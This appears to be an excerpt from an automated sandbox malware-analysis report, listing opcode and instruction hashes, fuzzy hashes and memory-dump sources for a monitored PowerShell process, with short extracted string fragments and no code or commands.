                                                                                            • Opcode ID: 6d4b26197259d9847d9b192ee3a09a147b16394aaa1fc262cc22afc36e2dd737
                                                                                            • Instruction ID: 62b8ad6becfbf3b685b5729101907e7cc5b72a54955eedfb6c977ba6435e2a4e
                                                                                            • Opcode Fuzzy Hash: 6d4b26197259d9847d9b192ee3a09a147b16394aaa1fc262cc22afc36e2dd737
                                                                                            • Instruction Fuzzy Hash: BBE0DF3465420EEFDF00DFD4DE1ABAEBF3ABB50315F200418E512AA142CBB549889B92
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2325323924.0000000008010000.00000040.00000800.00020000.00000000.sdmp, Offset: 08010000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_8010000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5a7cf7ce54741dcf1f3185a6460d8decbdc4c6f648539d326e382c21f545f05e
                                                                                            • Instruction ID: 592d67d9c8f7559ce398bde9d8918776e70eee8c9fda8b00909ceba54105ad30
                                                                                            • Opcode Fuzzy Hash: 5a7cf7ce54741dcf1f3185a6460d8decbdc4c6f648539d326e382c21f545f05e
                                                                                            • Instruction Fuzzy Hash: B3D0A73055520FDEEF00CFC4CA2577FB6B27B2031DF340418C411B5141D77506448692
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2318606240.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_a4d000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fb2cf5dfd897fca30ad81855e1a083918ef48eaf982f78ef2c0a1369efae7e52
                                                                                            • Instruction ID: 573a82f8cb31821feb4d5dc2e3fb8e28c840a8e2b61d61bce416e2caf62be130
                                                                                            • Opcode Fuzzy Hash: fb2cf5dfd897fca30ad81855e1a083918ef48eaf982f78ef2c0a1369efae7e52
                                                                                            • Instruction Fuzzy Hash: 0721E4B9604240DFDB04DF14D684B2AFBA9EBD4728F34C67DD9494B241C379D847C662
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2322581270.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_7360000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$pQ;$pQ;$x.rk$-rk
                                                                                            • API String ID: 0-602190489
                                                                                            • Opcode ID: 797bf0d87a299b366067235d851e622293b7b6d0cba3921a2de1b9d9359e11af
                                                                                            • Instruction ID: 3e7cc93fde71279eb6abe1a5a80624230259d120ec3241ef1340ae8ab64aaa5e
                                                                                            • Opcode Fuzzy Hash: 797bf0d87a299b366067235d851e622293b7b6d0cba3921a2de1b9d9359e11af
                                                                                            • Instruction Fuzzy Hash: 80225AB4B142199FDB24DF24C948B9ABBB2BB85300F10C5A6D9089F759CB31DE85CF91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2322581270.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_7360000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'^q$4'^q$tP^q$tP^q$tP^q$tP^q$$^q$(dq$(dq$(dq$(dq
                                                                                            • API String ID: 0-459999756
                                                                                            • Opcode ID: b0bc40ccd9520c8bda091b358daa1781311eccda124fc2ecbee18cb5a71430c6
                                                                                            • Instruction ID: b95986daa27595b066e5a9da48b8b94cf868f0bce7e2c8d5e69dc17f74a9e733
                                                                                            • Opcode Fuzzy Hash: b0bc40ccd9520c8bda091b358daa1781311eccda124fc2ecbee18cb5a71430c6
                                                                                            • Instruction Fuzzy Hash: A6A13CB1B002059FEB24DF58C50866EBBE2AF88310F14D469E8899F399CB31ED45C7B1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2322581270.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_7360000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'^q$4'^q$TQcq$TQcq$TQcq$tP^q$tP^q$$^q$$^q$$^q$$^q
                                                                                            • API String ID: 0-335829853
                                                                                            • Opcode ID: bd74b553790b668f530f345aa955e2f126cf636e4939673666de5e2cd3aa28e9
                                                                                            • Instruction ID: 9fa22f7b85298fdba36ed9eb0967522ab69d8e350f465a1cb3bd5650f1727ab0
                                                                                            • Opcode Fuzzy Hash: bd74b553790b668f530f345aa955e2f126cf636e4939673666de5e2cd3aa28e9
                                                                                            • Instruction Fuzzy Hash: 3F812AB0B0020ADFEB248E55C50C66A77E2BF84711F14D46AE4999F798DB32EC45C7B1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2322581270.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_7360000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q
                                                                                            • API String ID: 0-788909730
                                                                                            • Opcode ID: b778554b074b32a2bade81697ac83c3f6afa885f6cb85488ef314041ecc3681a
                                                                                            • Instruction ID: 7488b3e0581e33dd2a493d32cf5532f71748261b4891dd5ca63a731a4ba95c35
                                                                                            • Opcode Fuzzy Hash: b778554b074b32a2bade81697ac83c3f6afa885f6cb85488ef314041ecc3681a
                                                                                            • Instruction Fuzzy Hash: 45A17CB5F002069FE7249A68C5486AABBE2ABC4710F10C47AE4098F749DF32DE45C7D1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2325323924.0000000008010000.00000040.00000800.00020000.00000000.sdmp, Offset: 08010000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_8010000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: /<$(.<$2<$@/<$H.<$`/<$-<$.<$/<
                                                                                            • API String ID: 0-964630840
                                                                                            • Opcode ID: b9212528f883d8ab2670ade0d2d91891743944ba2b6892bd452cc99c2ce5d828
                                                                                            • Instruction ID: e21f7094250fcda0f10616ff1de9897aa8bd66e8c5fb62493389a9d7a4b868d1
                                                                                            • Opcode Fuzzy Hash: b9212528f883d8ab2670ade0d2d91891743944ba2b6892bd452cc99c2ce5d828
                                                                                            • Instruction Fuzzy Hash: BAD12574B002048FCB55DF68D454AAE7BF3ABC8705F1540A9E44ADB365EB35ED028F92
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2322581270.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_7360000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$x.rk$-rk
                                                                                            • API String ID: 0-1820374447
                                                                                            • Opcode ID: 436195990aca3bd41994c10be133ca8625417dbab033fa96e8029c7a52326188
                                                                                            • Instruction ID: b5f00b48a4c1030205834ce3c22ed51468b1663adf97b07921e77e8a9860bada
                                                                                            • Opcode Fuzzy Hash: 436195990aca3bd41994c10be133ca8625417dbab033fa96e8029c7a52326188
                                                                                            • Instruction Fuzzy Hash: 67D1BFB4A002059FDB14DFA8C559B9EBBF2AFC4304F24C429D4096FB59CB36EC468B91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2325323924.0000000008010000.00000040.00000800.00020000.00000000.sdmp, Offset: 08010000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_8010000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: /<$(.<$@/<$H.<$`/<$-<$.<$/<
                                                                                            • API String ID: 0-2785020883
                                                                                            • Opcode ID: c1cfca347597739e016e7d204db3a0557c3a0f2711dc32b9d90d0dd6d88a2fc8
                                                                                            • Instruction ID: c7c63d7291a8003e4fd3f0eb540393c285c4df554a7c638138e2c7cc63dfc84a
                                                                                            • Opcode Fuzzy Hash: c1cfca347597739e016e7d204db3a0557c3a0f2711dc32b9d90d0dd6d88a2fc8
                                                                                            • Instruction Fuzzy Hash: 67C11474B006048FCB54DF68D484AAE7BF7ABC8705F1540A9E40ADB365EB35ED028F92
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2322581270.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_7360000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                            • API String ID: 0-3732357466
                                                                                            • Opcode ID: 489f6b3504340d8751287f7f52a6d2f534d867f0d636920ae1d8d3dd397b33bd
                                                                                            • Instruction ID: 1a10e92afe8712cc16f4589f1298573d95c056997b82e07c6d6d10cce2f29471
                                                                                            • Opcode Fuzzy Hash: 489f6b3504340d8751287f7f52a6d2f534d867f0d636920ae1d8d3dd397b33bd
                                                                                            • Instruction Fuzzy Hash: 7441E1F171021ACFEB284E59D44C62A77EAAF81651F24C47EF50A8F65CCB31C895CBA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2322581270.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_7360000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'^q$tP^q$tP^q$$^q$(dq$(dq$(dq
                                                                                            • API String ID: 0-1710924510
                                                                                            • Opcode ID: 27e7db0f2e38d9716168104a45dbab78e22581b5dc4a9469861e2fcaa7a9e10b
                                                                                            • Instruction ID: 4cee57d8ed672e1e51ecdd0bec192236c63e3378000697bb3b1bab85084f9c38
                                                                                            • Opcode Fuzzy Hash: 27e7db0f2e38d9716168104a45dbab78e22581b5dc4a9469861e2fcaa7a9e10b
                                                                                            • Instruction Fuzzy Hash: 4271E9F1A002059FEB24CF18C5487A9BBF6AF45310F19E459D8899B299C731FD85CBB1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2322581270.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_7360000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'^q$TQcq$TQcq$tP^q$$^q$$^q$$^q
                                                                                            • API String ID: 0-2461640029
                                                                                            • Opcode ID: 67aa0f48fd092d8672552f43b9427733ff4d940a852347fd6b06719ed6e39585
                                                                                            • Instruction ID: 714565f04a8649c522cefd0bf5a2df8db4e352951e54024ba0848ef8a48e189c
                                                                                            • Opcode Fuzzy Hash: 67aa0f48fd092d8672552f43b9427733ff4d940a852347fd6b06719ed6e39585
                                                                                            • Instruction Fuzzy Hash: 5051F0F0A00206DFFB248E05C14C7A677E2AB45711F18E46AE89D9B698C731FC84CBB1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2322581270.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_7360000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Tqk$4'^q$4'^q$4'^q$4'^q$DUqk
                                                                                            • API String ID: 0-2925689652
                                                                                            • Opcode ID: 89b4d6b065d41851eb044d58c817a23dfeb5b0923f49c417314a2ec2155eaf71
                                                                                            • Instruction ID: c3f2b3e5dcd5a9dd6607d4bb923e83e42db91171bb51facced301d721e57eb2d
                                                                                            • Opcode Fuzzy Hash: 89b4d6b065d41851eb044d58c817a23dfeb5b0923f49c417314a2ec2155eaf71
                                                                                            • Instruction Fuzzy Hash: F2D13CF1B04206CFEB249B68D5496AABBF6AFC6610B14C47AD40DCF719EB32C845C751
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2322581270.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_7360000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'^q$4'^q$$^q$$^q$$^q$$^q
                                                                                            • API String ID: 0-3669853574
                                                                                            • Opcode ID: 6e31c3b32606f8ce4b4427d7363ff7dbb6fa4728fddd846d32cad24bfb4959d3
                                                                                            • Instruction ID: 90017d2dc087099514229aca1e86150de3906ca2bcbb032e006465b5d9e39551
                                                                                            • Opcode Fuzzy Hash: 6e31c3b32606f8ce4b4427d7363ff7dbb6fa4728fddd846d32cad24bfb4959d3
                                                                                            • Instruction Fuzzy Hash: 4D715BB1B042168FE7288A68D90AD6ABBE6EFC5314F14C47BD4098F759DF32C941C7A1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2322581270.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_7360000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: XRcq$XRcq$XRcq$tP^q$tP^q$$^q
                                                                                            • API String ID: 0-1682816917
                                                                                            • Opcode ID: c95d21819072ed5ca02c46344cab508ee86b224dab439270b6cc7111e7d17d4d
                                                                                            • Instruction ID: 66e2e711f2c361e8919f49b39536c048576dedd59247a0652658a169b264a4b3
                                                                                            • Opcode Fuzzy Hash: c95d21819072ed5ca02c46344cab508ee86b224dab439270b6cc7111e7d17d4d
                                                                                            • Instruction Fuzzy Hash: EA616BF0B102059FEF109F688548A7ABBE2AFC5300F24C4A9E9199F759CB31DD45CBA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2322581270.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_7360000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'^q$4'^q$x.rk$x.rk$-rk
                                                                                            • API String ID: 0-136328690
                                                                                            • Opcode ID: 0a753a481eb681b815a49a6414d02e01cf59ff1f2871d07f1b2fb04a58fea441
                                                                                            • Instruction ID: eaff1bbe55bca82163c2ab1d9903f4706f0f5e9d03facffe0d261cb6bcf151d0
                                                                                            • Opcode Fuzzy Hash: 0a753a481eb681b815a49a6414d02e01cf59ff1f2871d07f1b2fb04a58fea441
                                                                                            • Instruction Fuzzy Hash: 5EE1A2B4A402189FDB24EB68CD54B9E7BA2BB84300F10C4E5D909AF795CB71ED85CF91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2322581270.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_7360000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'^q$4'^q$4'^q$x.rk$-rk
                                                                                            • API String ID: 0-2663853734
                                                                                            • Opcode ID: 4aa8538f7c4420e5e965a8fb10f943d18c9c5301587f1e7214e5898bfe7578c4
                                                                                            • Instruction ID: 96fa9dfb32ca90726b17e9939e5f4039e32aaf82edf0ebce17e9b1d9088b712b
                                                                                            • Opcode Fuzzy Hash: 4aa8538f7c4420e5e965a8fb10f943d18c9c5301587f1e7214e5898bfe7578c4
                                                                                            • Instruction Fuzzy Hash: CAB18EB4A002059FDB14DFA4C558B9ABBB2AF88304F25C469E4096F759CB36EC46CB91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2322581270.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_7360000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'^q$4'^q$tP^q$tP^q$$qk
                                                                                            • API String ID: 0-1648107038
                                                                                            • Opcode ID: 455acc6882b190e4d020cb870fdc4f5e56ab323d6cd87eee167b856b20bed55c
                                                                                            • Instruction ID: 9007c2fa001a9864814b2952f7df4c03439997614a85f5f01721079eeedc8454
                                                                                            • Opcode Fuzzy Hash: 455acc6882b190e4d020cb870fdc4f5e56ab323d6cd87eee167b856b20bed55c
                                                                                            • Instruction Fuzzy Hash: 5F817DF5B0430A9FE7345A6889097ABBBE6AFC1310F14C47AD5098F759DB32C845C3A2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2322581270.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_7360000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'^q$4'^q$4'^q$x.rk$-rk
                                                                                            • API String ID: 0-2663853734
                                                                                            • Opcode ID: 55b03eafafbd85c6c6757614025d722a86840f3663e49de4634dd4c5d05afed7
                                                                                            • Instruction ID: 481e7f81eb66bddfce8af0e86aa36f294edd68e6e4d3f16f8fb030458d75adc0
                                                                                            • Opcode Fuzzy Hash: 55b03eafafbd85c6c6757614025d722a86840f3663e49de4634dd4c5d05afed7
                                                                                            • Instruction Fuzzy Hash: D2A159B4A4021ACFEB24DB14C945BD9BBB2BB85304F1085E5D5086F785CB71EE85CFA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2322581270.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_7360000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                            • API String ID: 0-3272787073
                                                                                            • Opcode ID: 8f3eaf2fdc6012afae551bded3c738a92cf5e33055ccfd8be86b075d66261b87
                                                                                            • Instruction ID: 6f6006666bc067861c7b82903ed53b5c6b6f6771ba2fde3b6769dfce6bd913ab
                                                                                            • Opcode Fuzzy Hash: 8f3eaf2fdc6012afae551bded3c738a92cf5e33055ccfd8be86b075d66261b87
                                                                                            • Instruction Fuzzy Hash: A151F5F0B1021ADFEB249E65D54866ABBE6AB85310F30C42AD50DCFA59DB32C944CF91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2322581270.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_7360000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                            • API String ID: 0-3272787073
                                                                                            • Opcode ID: 64cf60d2dd39c1c742090c9f34a1ba788109b17fae7f162886bf72f0bd1b5fc6
                                                                                            • Instruction ID: 480208635df0134ea14de631c8f4028a6d1cec59b2afccbf76111fb4ab17ed61
                                                                                            • Opcode Fuzzy Hash: 64cf60d2dd39c1c742090c9f34a1ba788109b17fae7f162886bf72f0bd1b5fc6
                                                                                            • Instruction Fuzzy Hash: 214127F2700207DFEB285A29C50C66AB7E6AFC1211F14C47AD65A8F399DE32C965C361
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2322581270.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_7360000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                            • API String ID: 0-3272787073
                                                                                            • Opcode ID: 161a228d8fb30caa03845e0a240dac68344677c223a9689addff14c980ed2a0a
                                                                                            • Instruction ID: 9313d8686883e32fdd85db98cdac62df26b509d572020a44d369cc79c3580b1b
                                                                                            • Opcode Fuzzy Hash: 161a228d8fb30caa03845e0a240dac68344677c223a9689addff14c980ed2a0a
                                                                                            • Instruction Fuzzy Hash: 7E413CF1B0421A8FEB248A6A880867BB7E9AFC5610F24D47AD589CB20DDA31D445C771
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2322581270.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_7360000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'^q$tP^q$$^q$$^q$$^q
                                                                                            • API String ID: 0-3997570045
                                                                                            • Opcode ID: 2d96f25ea36a744ca9e62f79f2bd2fdf5f3574a7a8129039168a63c63bd08320
                                                                                            • Instruction ID: 0184b5da8816e175f61d8c722f3054fae2e2d20001e754b2653dd85cc81aa97f
                                                                                            • Opcode Fuzzy Hash: 2d96f25ea36a744ca9e62f79f2bd2fdf5f3574a7a8129039168a63c63bd08320
                                                                                            • Instruction Fuzzy Hash: 704107F5E04286EFFB258F14C54CBA5BBA1AB45710F04C4A6E51C5F69ACB32CA44CB51
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2322581270.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_7360000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                            • API String ID: 0-3272787073
                                                                                            • Opcode ID: 5116ffa3ba44b3ef5ecab611ef525b473780d8ee02e7e2248bd5354d62873073
                                                                                            • Instruction ID: 095fd930fe54c65148d7f1b6db5c7b000b3d47e9095ab2290597e28460445602
                                                                                            • Opcode Fuzzy Hash: 5116ffa3ba44b3ef5ecab611ef525b473780d8ee02e7e2248bd5354d62873073
                                                                                            • Instruction Fuzzy Hash: 9A314CF6B05206CFFB295E64981D176BBE5ABC1294B24C87EC40D8F25CDE32C449C7A2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2322581270.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_7360000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                            • API String ID: 0-3272787073
                                                                                            • Opcode ID: 08216867794e2a90a431313c69aa60e9f33711da156df112ff64b124f26bed57
                                                                                            • Instruction ID: d0abf3e507fc39a1acd06019d93f8428ac7a01116c816df68747860af827b452
                                                                                            • Opcode Fuzzy Hash: 08216867794e2a90a431313c69aa60e9f33711da156df112ff64b124f26bed57
                                                                                            • Instruction Fuzzy Hash: 48310AB1B0820ADFEB24AF69C40966B7BF5AFC5250F14C47AD40D8B218DB32C995C792
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2322581270.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_7360000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'^q$$^q$$^q$$^q$$^q
                                                                                            • API String ID: 0-2825857601
                                                                                            • Opcode ID: 5dea3b2856b128e9213ca4e840cb1a07bc555559b10ba91022dc4cfaa138447c
                                                                                            • Instruction ID: 7b7ee1bcea3da49426ebf08ea1a47242855e5e9c7309a6b60a2c32f162e4e7b9
                                                                                            • Opcode Fuzzy Hash: 5dea3b2856b128e9213ca4e840cb1a07bc555559b10ba91022dc4cfaa138447c
                                                                                            • Instruction Fuzzy Hash: 0631EBF16143069FFB354E05C40C6257BBAAF42211F28C0BBFA0E8B55DC731C8A4CA21
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2322581270.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_7360000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $^q$$^q$$^q$wl$wl
                                                                                            • API String ID: 0-3213030559
                                                                                            • Opcode ID: 3bcafe16f9ab711fad43922bc8f068a3907d14db4c0174191d3e33391479e681
                                                                                            • Instruction ID: 8dd78fca8f075464397baf0e9e0766fa2cfcdf06c35e1ebc61c8ad751e9ca0fa
                                                                                            • Opcode Fuzzy Hash: 3bcafe16f9ab711fad43922bc8f068a3907d14db4c0174191d3e33391479e681
                                                                                            • Instruction Fuzzy Hash: 8A112CF930030A9BFB3C471A980AF67B79AABC1750F24C42AE44D8A358ED71C485C350
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2322581270.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_7360000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'^q$4'^q$tP^q$tP^q
                                                                                            • API String ID: 0-3859475322
                                                                                            • Opcode ID: 0797e0125b238190924d9e449366866abb622ddcab98478dda597096e3d535c2
                                                                                            • Instruction ID: dae8124a9ddfaf679946347ebf224face9deb545ebb7f8b51965c3355d5f4a0b
                                                                                            • Opcode Fuzzy Hash: 0797e0125b238190924d9e449366866abb622ddcab98478dda597096e3d535c2
                                                                                            • Instruction Fuzzy Hash: F48180B1704206AFE7249A7889487BBBBE6AFC5314F14C866D5098F359DF32CC45C3A2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2322581270.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_7360000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'^q$4'^q$tP^q$tP^q
                                                                                            • API String ID: 0-3859475322
